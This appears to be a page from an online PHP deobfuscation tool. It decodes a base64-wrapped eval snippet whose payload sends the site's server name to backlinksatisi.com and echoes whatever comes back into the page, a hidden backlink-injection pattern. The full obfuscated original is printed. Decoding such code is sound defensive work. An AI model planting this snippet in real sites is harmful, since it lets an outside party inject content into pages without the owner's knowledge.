Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval("?>".base64_decode("DQpmdW5jdGlvbiBnZXRCTCgkdXJsKXsNCgkkcmVzcG9uc2UgPSBmaWxlX2d..
Decoded Output download
?>b'
function getBL($url){
$response = file_get_contents("https://backlinksatisi.com/api/getLinks/".$url);
return $response;
}
echo getBL($_SERVER["SERVER_NAME"]);
'
Did this file decode correctly?
Original Code
<?php eval("?>".base64_decode("DQpmdW5jdGlvbiBnZXRCTCgkdXJsKXsNCgkkcmVzcG9uc2UgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9iYWNrbGlua3NhdGlzaS5jb20vYXBpL2dldExpbmtzLyIuJHVybCk7DQoJcmV0dXJuICRyZXNwb25zZTsNCn0NCg0KZWNobyBnZXRCTCgkX1NFUlZFUlsiU0VSVkVSX05BTUUiXSk7DQo=")); ?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 9ae4aca706e8b9c07f95f371120fa2ef |
Eval Count | 1 |
Decode Time | 87 ms |